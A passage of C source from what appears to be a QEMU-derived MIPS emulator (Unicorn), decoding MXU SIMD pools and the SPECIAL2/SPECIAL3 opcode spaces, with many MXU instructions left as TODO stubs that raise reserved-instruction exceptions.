OPC_MXU_Q16ACC: /* TODO: Implement emulation of Q16ACC instruction. */ MIPS_INVAL("OPC_MXU_Q16ACC"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16ACCM: /* TODO: Implement emulation of Q16ACCM instruction. */ MIPS_INVAL("OPC_MXU_Q16ACCM"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16ASUM: /* TODO: Implement emulation of Q16ASUM instruction. */ MIPS_INVAL("OPC_MXU_Q16ASUM"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool14 * * Q8ADDE, Q8ACCE: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |0 0|x x| XRd | XRc | XRb | XRa |MXU__POOL14| * +-----------+---+---+-------+-------+-------+-------+-----------+ * * D8SUM, D8SUMC: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |en2|x x|0 0 0 0| XRc | XRb | XRa |MXU__POOL14| * +-----------+---+---+-------+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool14(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 22, 2); switch (opcode) { case OPC_MXU_Q8ADDE: /* TODO: Implement emulation of Q8ADDE instruction. */ MIPS_INVAL("OPC_MXU_Q8ADDE"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D8SUM: /* TODO: Implement emulation of D8SUM instruction. */ MIPS_INVAL("OPC_MXU_D8SUM"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D8SUMC: /* TODO: Implement emulation of D8SUMC instruction. */ MIPS_INVAL("OPC_MXU_D8SUMC"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool15 * * S32MUL, S32MULU, S32EXTRV: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---+-------+-------+-----------+ * | SPECIAL2 | rs | rt |x x| XRd | XRa |MXU__POOL15| * +-----------+---------+---------+---+-------+-------+-----------+ * * S32EXTR: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---+-------+-------+-----------+ * | SPECIAL2 | rb | sft5 |x x| XRd | XRa |MXU__POOL15| * +-----------+---------+---------+---+-------+-------+-----------+ * */ static void decode_opc_mxu__pool15(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 14, 2); switch (opcode) { case OPC_MXU_S32MUL: /* TODO: Implement emulation of S32MUL instruction. */ MIPS_INVAL("OPC_MXU_S32MUL"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32MULU: /* TODO: Implement emulation of S32MULU instruction. */ MIPS_INVAL("OPC_MXU_S32MULU"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32EXTR: /* TODO: Implement emulation of S32EXTR instruction. */ MIPS_INVAL("OPC_MXU_S32EXTR"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32EXTRV: /* TODO: Implement emulation of S32EXTRV instruction. */ MIPS_INVAL("OPC_MXU_S32EXTRV"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool16 * * D32SARW: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 | rb |x x x| XRc | XRb | XRa |MXU__POOL16| * +-----------+---------+-----+-------+-------+-------+-----------+ * * S32ALN: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 | rs |x x x| XRc | XRb | XRa |MXU__POOL16| * +-----------+---------+-----+-------+-------+-------+-----------+ * * S32ALNI: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+-----+---+-----+-------+-------+-------+-----------+ * | SPECIAL2 | s3 |0 0|x x x| XRc | XRb | XRa |MXU__POOL16| * +-----------+-----+---+-----+-------+-------+-------+-----------+ * * S32LUI: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+-----+---+-----+-------+---------------+-----------+ * | SPECIAL2 |optn3|0 0|x x x| XRc | s8 |MXU__POOL16| * +-----------+-----+---+-----+-------+---------------+-----------+ * * S32NOR, S32AND, S32OR, S32XOR: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0|x x x| XRc | XRb | XRa |MXU__POOL16| * +-----------+---------+-----+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool16(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 18, 3); switch (opcode) { case OPC_MXU_D32SARW: /* TODO: Implement emulation of D32SARW instruction. */ MIPS_INVAL("OPC_MXU_D32SARW"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32ALN: /* TODO: Implement emulation of S32ALN instruction. */ MIPS_INVAL("OPC_MXU_S32ALN"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32ALNI: gen_mxu_S32ALNI(ctx); break; case OPC_MXU_S32LUI: /* TODO: Implement emulation of S32LUI instruction. */ MIPS_INVAL("OPC_MXU_S32LUI"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32NOR: gen_mxu_S32NOR(ctx); break; case OPC_MXU_S32AND: gen_mxu_S32AND(ctx); break; case OPC_MXU_S32OR: gen_mxu_S32OR(ctx); break; case OPC_MXU_S32XOR: gen_mxu_S32XOR(ctx); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool17 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---+---------+-----+-----------+ * | SPECIAL2 | rs | rt |0 0| rd |x x x|MXU__POOL15| * +-----------+---------+---------+---+---------+-----+-----------+ * */ static void decode_opc_mxu__pool17(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 6, 2); switch (opcode) { case OPC_MXU_LXW: /* TODO: Implement emulation of LXW instruction. */ MIPS_INVAL("OPC_MXU_LXW"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_LXH: /* TODO: Implement emulation of LXH instruction. */ MIPS_INVAL("OPC_MXU_LXH"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_LXHU: /* TODO: Implement emulation of LXHU instruction. */ MIPS_INVAL("OPC_MXU_LXHU"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_LXB: /* TODO: Implement emulation of LXB instruction. */ MIPS_INVAL("OPC_MXU_LXB"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_LXBU: /* TODO: Implement emulation of LXBU instruction. */ MIPS_INVAL("OPC_MXU_LXBU"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool18 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 | rb |x x x| XRd | XRa |0 0 0 0|MXU__POOL18| * +-----------+---------+-----+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool18(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 18, 3); switch (opcode) { case OPC_MXU_D32SLLV: /* TODO: Implement emulation of D32SLLV instruction. */ MIPS_INVAL("OPC_MXU_D32SLLV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32SLRV: /* TODO: Implement emulation of D32SLRV instruction. */ MIPS_INVAL("OPC_MXU_D32SLRV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32SARV: /* TODO: Implement emulation of D32SARV instruction. */ MIPS_INVAL("OPC_MXU_D32SARV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16SLLV: /* TODO: Implement emulation of Q16SLLV instruction. */ MIPS_INVAL("OPC_MXU_Q16SLLV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16SLRV: /* TODO: Implement emulation of Q16SLRV instruction. */ MIPS_INVAL("OPC_MXU_Q16SLRV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16SARV: /* TODO: Implement emulation of Q16SARV instruction. */ MIPS_INVAL("OPC_MXU_Q16SARV"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool19 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |0 0|x x| XRd | XRc | XRb | XRa |MXU__POOL19| * +-----------+---+---+-------+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool19(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 22, 2); switch (opcode) { case OPC_MXU_Q8MUL: case OPC_MXU_Q8MULSU: gen_mxu_q8mul_q8mulsu(ctx); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool20 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0|x x x| XRc | XRb | XRa |MXU__POOL20| * +-----------+---------+-----+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool20(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 18, 3); switch (opcode) { case OPC_MXU_Q8MOVZ: /* TODO: Implement emulation of Q8MOVZ instruction. */ MIPS_INVAL("OPC_MXU_Q8MOVZ"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8MOVN: /* TODO: Implement emulation of Q8MOVN instruction. */ MIPS_INVAL("OPC_MXU_Q8MOVN"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16MOVZ: /* TODO: Implement emulation of D16MOVZ instruction. */ MIPS_INVAL("OPC_MXU_D16MOVZ"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16MOVN: /* TODO: Implement emulation of D16MOVN instruction. */ MIPS_INVAL("OPC_MXU_D16MOVN"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32MOVZ: /* TODO: Implement emulation of S32MOVZ instruction. */ MIPS_INVAL("OPC_MXU_S32MOVZ"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32MOVN: /* TODO: Implement emulation of S32MOVN instruction. */ MIPS_INVAL("OPC_MXU_S32MOVN"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool21 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |an2|x x| XRd | XRc | XRb | XRa |MXU__POOL21| * +-----------+---+---+-------+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool21(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 22, 2); switch (opcode) { case OPC_MXU_Q8MAC: /* TODO: Implement emulation of Q8MAC instruction. */ MIPS_INVAL("OPC_MXU_Q8MAC"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8MACSU: /* TODO: Implement emulation of Q8MACSU instruction. */ MIPS_INVAL("OPC_MXU_Q8MACSU"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * Main MXU decoding function * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------------------------------------+-----------+ * | SPECIAL2 | |x x x x x x| * +-----------+---------------------------------------+-----------+ * */ static void decode_opc_mxu(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* * TODO: Investigate necessity of including handling of * CLZ, CLO, SDBB in this function, as they belong to * SPECIAL2 opcode space for regular pre-R6 MIPS ISAs. */ uint32_t opcode = extract32(ctx->opcode, 0, 6); if (opcode == OPC__MXU_MUL) { uint32_t rs, rt, rd, op1; rs = extract32(ctx->opcode, 21, 5); rt = extract32(ctx->opcode, 16, 5); rd = extract32(ctx->opcode, 11, 5); op1 = MASK_SPECIAL2(ctx->opcode); gen_arith(ctx, op1, rd, rs, rt); return; } if (opcode == OPC_MXU_S32M2I) { gen_mxu_s32m2i(ctx); return; } if (opcode == OPC_MXU_S32I2M) { gen_mxu_s32i2m(ctx); return; } { TCGv t_mxu_cr = tcg_temp_new(tcg_ctx); TCGLabel *l_exit = gen_new_label(tcg_ctx); gen_load_mxu_cr(tcg_ctx, t_mxu_cr); tcg_gen_andi_tl(tcg_ctx, t_mxu_cr, t_mxu_cr, MXU_CR_MXU_EN); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t_mxu_cr, MXU_CR_MXU_EN, l_exit); switch (opcode) { case OPC_MXU_S32MADD: /* TODO: Implement emulation of S32MADD instruction. */ MIPS_INVAL("OPC_MXU_S32MADD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32MADDU: /* TODO: Implement emulation of S32MADDU instruction. */ MIPS_INVAL("OPC_MXU_S32MADDU"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU__POOL00: decode_opc_mxu__pool00(env, ctx); break; case OPC_MXU_S32MSUB: /* TODO: Implement emulation of S32MSUB instruction. */ MIPS_INVAL("OPC_MXU_S32MSUB"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32MSUBU: /* TODO: Implement emulation of S32MSUBU instruction. */ MIPS_INVAL("OPC_MXU_S32MSUBU"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU__POOL01: decode_opc_mxu__pool01(env, ctx); break; case OPC_MXU__POOL02: decode_opc_mxu__pool02(env, ctx); break; case OPC_MXU_D16MUL: gen_mxu_d16mul(ctx); break; case OPC_MXU__POOL03: decode_opc_mxu__pool03(env, ctx); break; case OPC_MXU_D16MAC: gen_mxu_d16mac(ctx); break; case OPC_MXU_D16MACF: /* TODO: Implement emulation of D16MACF instruction. */ MIPS_INVAL("OPC_MXU_D16MACF"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16MADL: /* TODO: Implement emulation of D16MADL instruction. */ MIPS_INVAL("OPC_MXU_D16MADL"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S16MAD: /* TODO: Implement emulation of S16MAD instruction. */ MIPS_INVAL("OPC_MXU_S16MAD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16ADD: /* TODO: Implement emulation of Q16ADD instruction. */ MIPS_INVAL("OPC_MXU_Q16ADD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16MACE: /* TODO: Implement emulation of D16MACE instruction. */ MIPS_INVAL("OPC_MXU_D16MACE"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU__POOL04: decode_opc_mxu__pool04(env, ctx); break; case OPC_MXU__POOL05: decode_opc_mxu__pool05(env, ctx); break; case OPC_MXU__POOL06: decode_opc_mxu__pool06(env, ctx); break; case OPC_MXU__POOL07: decode_opc_mxu__pool07(env, ctx); break; case OPC_MXU__POOL08: decode_opc_mxu__pool08(env, ctx); break; case OPC_MXU__POOL09: decode_opc_mxu__pool09(env, ctx); break; case OPC_MXU__POOL10: decode_opc_mxu__pool10(env, ctx); break; case OPC_MXU__POOL11: decode_opc_mxu__pool11(env, ctx); break; case OPC_MXU_D32ADD: /* TODO: Implement emulation of D32ADD instruction. */ MIPS_INVAL("OPC_MXU_D32ADD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU__POOL12: decode_opc_mxu__pool12(env, ctx); break; case OPC_MXU__POOL13: decode_opc_mxu__pool13(env, ctx); break; case OPC_MXU__POOL14: decode_opc_mxu__pool14(env, ctx); break; case OPC_MXU_Q8ACCE: /* TODO: Implement emulation of Q8ACCE instruction. */ MIPS_INVAL("OPC_MXU_Q8ACCE"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S8LDD: gen_mxu_s8ldd(ctx); break; case OPC_MXU_S8STD: /* TODO: Implement emulation of S8STD instruction. */ MIPS_INVAL("OPC_MXU_S8STD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S8LDI: /* TODO: Implement emulation of S8LDI instruction. */ MIPS_INVAL("OPC_MXU_S8LDI"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S8SDI: /* TODO: Implement emulation of S8SDI instruction. */ MIPS_INVAL("OPC_MXU_S8SDI"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU__POOL15: decode_opc_mxu__pool15(env, ctx); break; case OPC_MXU__POOL16: decode_opc_mxu__pool16(env, ctx); break; case OPC_MXU__POOL17: decode_opc_mxu__pool17(env, ctx); break; case OPC_MXU_S16LDD: /* TODO: Implement emulation of S16LDD instruction. */ MIPS_INVAL("OPC_MXU_S16LDD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S16STD: /* TODO: Implement emulation of S16STD instruction. */ MIPS_INVAL("OPC_MXU_S16STD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S16LDI: /* TODO: Implement emulation of S16LDI instruction. */ MIPS_INVAL("OPC_MXU_S16LDI"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S16SDI: /* TODO: Implement emulation of S16SDI instruction. */ MIPS_INVAL("OPC_MXU_S16SDI"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32SLL: /* TODO: Implement emulation of D32SLL instruction. */ MIPS_INVAL("OPC_MXU_D32SLL"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32SLR: /* TODO: Implement emulation of D32SLR instruction. */ MIPS_INVAL("OPC_MXU_D32SLR"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32SARL: /* TODO: Implement emulation of D32SARL instruction. */ MIPS_INVAL("OPC_MXU_D32SARL"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32SAR: /* TODO: Implement emulation of D32SAR instruction. */ MIPS_INVAL("OPC_MXU_D32SAR"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16SLL: /* TODO: Implement emulation of Q16SLL instruction. */ MIPS_INVAL("OPC_MXU_Q16SLL"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16SLR: /* TODO: Implement emulation of Q16SLR instruction. */ MIPS_INVAL("OPC_MXU_Q16SLR"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU__POOL18: decode_opc_mxu__pool18(env, ctx); break; case OPC_MXU_Q16SAR: /* TODO: Implement emulation of Q16SAR instruction. */ MIPS_INVAL("OPC_MXU_Q16SAR"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU__POOL19: decode_opc_mxu__pool19(env, ctx); break; case OPC_MXU__POOL20: decode_opc_mxu__pool20(env, ctx); break; case OPC_MXU__POOL21: decode_opc_mxu__pool21(env, ctx); break; case OPC_MXU_Q16SCOP: /* TODO: Implement emulation of Q16SCOP instruction. */ MIPS_INVAL("OPC_MXU_Q16SCOP"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8MADL: /* TODO: Implement emulation of Q8MADL instruction. */ MIPS_INVAL("OPC_MXU_Q8MADL"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32SFL: /* TODO: Implement emulation of S32SFL instruction. */ MIPS_INVAL("OPC_MXU_S32SFL"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8SAD: /* TODO: Implement emulation of Q8SAD instruction. */ MIPS_INVAL("OPC_MXU_Q8SAD"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); } gen_set_label(tcg_ctx, l_exit); tcg_temp_free(tcg_ctx, t_mxu_cr); } } #endif /* !defined(TARGET_MIPS64) */ static void decode_opc_special2_legacy(CPUMIPSState *env, DisasContext *ctx) { int rs, rt, rd; uint32_t op1; check_insn_opc_removed(ctx, ISA_MIPS32R6); rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; op1 = MASK_SPECIAL2(ctx->opcode); switch (op1) { case OPC_MADD: /* Multiply and add/sub */ case OPC_MADDU: case OPC_MSUB: case OPC_MSUBU: check_insn(ctx, ISA_MIPS32); gen_muldiv(ctx, op1, rd & 3, rs, rt); break; case OPC_MUL: gen_arith(ctx, op1, rd, rs, rt); break; case OPC_DIV_G_2F: case OPC_DIVU_G_2F: case OPC_MULT_G_2F: case OPC_MULTU_G_2F: case OPC_MOD_G_2F: case OPC_MODU_G_2F: check_insn(ctx, INSN_LOONGSON2F); gen_loongson_integer(ctx, op1, rd, rs, rt); break; case OPC_CLO: case OPC_CLZ: check_insn(ctx, ISA_MIPS32); gen_cl(ctx, op1, rd, rs); break; case OPC_SDBBP: if (is_uhi(extract32(ctx->opcode, 6, 20))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { /* * XXX: not clear which exception should be raised * when in debug mode... */ check_insn(ctx, ISA_MIPS32); generate_exception_end(ctx, EXCP_DBp); } break; #if defined(TARGET_MIPS64) case OPC_DCLO: case OPC_DCLZ: check_insn(ctx, ISA_MIPS64); check_mips_64(ctx); gen_cl(ctx, op1, rd, rs); break; case OPC_DMULT_G_2F: case OPC_DMULTU_G_2F: case OPC_DDIV_G_2F: case OPC_DDIVU_G_2F: case OPC_DMOD_G_2F: case OPC_DMODU_G_2F: check_insn(ctx, INSN_LOONGSON2F); gen_loongson_integer(ctx, op1, rd, rs, rt); break; #endif default: /* Invalid */ MIPS_INVAL("special2_legacy"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_opc_special3_r6(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rs, rt, rd, sa; uint32_t op1, op2; int16_t imm; rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 6) & 0x1f; imm = (int16_t)ctx->opcode >> 7; op1 = MASK_SPECIAL3(ctx->opcode); switch (op1) { case R6_OPC_PREF: if (rt >= 24) { /* hint codes 24-31 are reserved and signal RI */ generate_exception_end(ctx, EXCP_RI); } /* Treat as NOP. */ break; case R6_OPC_CACHE: check_cp0_enabled(ctx); if (ctx->hflags & MIPS_HFLAG_ITC_CACHE) { gen_cache_operation(ctx, rt, rs, imm); } break; case R6_OPC_SC: gen_st_cond(ctx, rt, rs, imm, MO_TESL, false); break; case R6_OPC_LL: gen_ld(ctx, op1, rt, rs, imm); break; case OPC_BSHFL: { if (rd == 0) { /* Treat as NOP. */ break; } op2 = MASK_BSHFL(ctx->opcode); switch (op2) { case OPC_ALIGN: case OPC_ALIGN_1: case OPC_ALIGN_2: case OPC_ALIGN_3: gen_align(ctx, 32, rd, rs, rt, sa & 3); break; case OPC_BITSWAP: gen_bitswap(ctx, op2, rd, rt); break; } } break; case OPC_GINV: if (unlikely(ctx->gi <= 1)) { generate_exception_end(ctx, EXCP_RI); } check_cp0_enabled(ctx); switch ((ctx->opcode >> 6) & 3) { case 0: /* GINVI */ /* Treat as NOP. */ break; case 2: /* GINVT */ gen_helper_0e1i(ginvt, tcg_ctx->cpu_gpr[rs], extract32(ctx->opcode, 8, 2)); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; #if defined(TARGET_MIPS64) case R6_OPC_SCD: gen_st_cond(ctx, rt, rs, imm, MO_TEQ, false); break; case R6_OPC_LLD: gen_ld(ctx, op1, rt, rs, imm); break; case OPC_DBSHFL: check_mips_64(ctx); { if (rd == 0) { /* Treat as NOP. */ break; } op2 = MASK_DBSHFL(ctx->opcode); switch (op2) { case OPC_DALIGN: case OPC_DALIGN_1: case OPC_DALIGN_2: case OPC_DALIGN_3: case OPC_DALIGN_4: case OPC_DALIGN_5: case OPC_DALIGN_6: case OPC_DALIGN_7: gen_align(ctx, 64, rd, rs, rt, sa & 7); break; case OPC_DBITSWAP: gen_bitswap(ctx, op2, rd, rt); break; } } break; #endif default: /* Invalid */ MIPS_INVAL("special3_r6"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_opc_special3_legacy(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rs, rt, rd; uint32_t op1, op2; rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; op1 = MASK_SPECIAL3(ctx->opcode); switch (op1) { case OPC_DIV_G_2E: case OPC_DIVU_G_2E: case OPC_MOD_G_2E: case OPC_MODU_G_2E: case OPC_MULT_G_2E: case OPC_MULTU_G_2E: /* * OPC_MULT_G_2E, OPC_ADDUH_QB_DSP, OPC_MUL_PH_DSP have * the same mask and op1. */ if ((ctx->insn_flags & ASE_DSP_R2) && (op1 == OPC_MULT_G_2E)) { op2 = MASK_ADDUH_QB(ctx->opcode); switch (op2) { case OPC_ADDUH_QB: case OPC_ADDUH_R_QB: case OPC_ADDQH_PH: case OPC_ADDQH_R_PH: case OPC_ADDQH_W: case OPC_ADDQH_R_W: case OPC_SUBUH_QB: case OPC_SUBUH_R_QB: case OPC_SUBQH_PH: case OPC_SUBQH_R_PH: case OPC_SUBQH_W: case OPC_SUBQH_R_W: gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); break; case OPC_MUL_PH: case OPC_MUL_S_PH: case OPC_MULQ_S_W: case OPC_MULQ_RS_W: gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 1); break; default: MIPS_INVAL("MASK ADDUH.QB"); generate_exception_end(ctx, EXCP_RI); break; } } else if (ctx->insn_flags & INSN_LOONGSON2E) { gen_loongson_integer(ctx, op1, rd, rs, rt); } else { generate_exception_end(ctx, EXCP_RI); } break; case OPC_LX_DSP: op2 = MASK_LX(ctx->opcode); switch (op2) { #if defined(TARGET_MIPS64) case OPC_LDX: #endif case OPC_LBUX: case OPC_LHX: case OPC_LWX: gen_mipsdsp_ld(ctx, op2, rd, rs, rt); break; default: /* Invalid */ MIPS_INVAL("MASK LX"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_ABSQ_S_PH_DSP: op2 = MASK_ABSQ_S_PH(ctx->opcode); switch (op2) { case OPC_ABSQ_S_QB: case OPC_ABSQ_S_PH: case OPC_ABSQ_S_W: case OPC_PRECEQ_W_PHL: case OPC_PRECEQ_W_PHR: case OPC_PRECEQU_PH_QBL: case OPC_PRECEQU_PH_QBR: case OPC_PRECEQU_PH_QBLA: case OPC_PRECEQU_PH_QBRA: case OPC_PRECEU_PH_QBL: case OPC_PRECEU_PH_QBR: case OPC_PRECEU_PH_QBLA: case OPC_PRECEU_PH_QBRA: gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); break; case OPC_BITREV: case OPC_REPL_QB: case OPC_REPLV_QB: case OPC_REPL_PH: case OPC_REPLV_PH: gen_mipsdsp_bitinsn(ctx, op1, op2, rd, rt); break; default: MIPS_INVAL("MASK ABSQ_S.PH"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_ADDU_QB_DSP: op2 = MASK_ADDU_QB(ctx->opcode); switch (op2) { case OPC_ADDQ_PH: case OPC_ADDQ_S_PH: case OPC_ADDQ_S_W: case OPC_ADDU_QB: case OPC_ADDU_S_QB: case OPC_ADDU_PH: case OPC_ADDU_S_PH: case OPC_SUBQ_PH: case OPC_SUBQ_S_PH: case OPC_SUBQ_S_W: case OPC_SUBU_QB: case OPC_SUBU_S_QB: case OPC_SUBU_PH: case OPC_SUBU_S_PH: case OPC_ADDSC: case OPC_ADDWC: case OPC_MODSUB: case OPC_RADDU_W_QB: gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); break; case OPC_MULEU_S_PH_QBL: case OPC_MULEU_S_PH_QBR: case OPC_MULQ_RS_PH: case OPC_MULEQ_S_W_PHL: case OPC_MULEQ_S_W_PHR: case OPC_MULQ_S_PH: gen_mipsdsp_multiply(ctx, op1, 